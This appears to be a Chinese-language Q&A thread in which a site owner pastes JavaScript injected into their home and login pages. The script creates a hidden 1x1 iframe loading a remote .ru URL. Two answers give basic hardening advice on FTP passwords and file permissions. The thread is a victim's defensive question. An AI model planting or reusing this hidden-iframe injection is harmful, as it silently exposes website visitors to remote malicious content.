Javascript代码自动添加到服务器页面

时间:2012-12-31 05:52:31

标签: ftp web-hosting spam virus

今天早上我注意到我的托管网站上添加了一些Javascript。当我下载主页时代码就像  <!--04b037--><script type="text/javascript"language="javascript"> (function () { var ipexz = document.createElement('iframe'); ipexz.src = 'http://nypmivhy.ru/count5.php'; ipexz.style.position = 'absolute'; ipexz.style.border = '0'; ipexz.style.height = '1px'; ipexz.style.width = '1px'; ipexz.style.left = '1px'; ipexz.style.top = '1px'; if (!document.getElementById('ipexz')) { document.write('<div id=\'ipexz\'></div>'); document.getElementById('ipexz').appendChild(ipexz); }})();</script><!--/04b037--> 在登录页面:

(function () { var usyux = document.createElement('iframe'); usyux.src = 'http://nypmivhy.ru/count5.php'; usyux.style.position = 'absolute'; usyux.style.border = '0'; usyux.style.height = '1px'; usyux.style.width = '1px'; usyux.style.left = '1px'; usyux.style.top = '1px'; if (!document.getElementById('usyux')) { document.write('
'); document.getElementById('usyux').appendChild(usyux); }})();" method="post"> Email

我猜它是病毒/垃圾邮件攻击。虽然我现在删除了javascript代码,但我想如何防止我的网站遭受此类攻击。注意:我的FTP密码非常弱。

2 个答案:

答案 0 :(得分:2)

  

注意:我的FTP密码非常弱。

你知道自己做错了什么而且还在问吗?首先解决此问题,同时保护您的计算机,如果您使用的是脚本,请查看日志以查找黑客攻击并确保其安全。

答案 1 :(得分:1)

检查文件的权限是否正确,否则可能是代码被注入。

看看这个:

http://ag.arizona.edu/ecat/web/permissions.html

您必须为文件设置3个主要权限:

read from the file
write to the file
execute the file

以下是权限摘要

enter image description here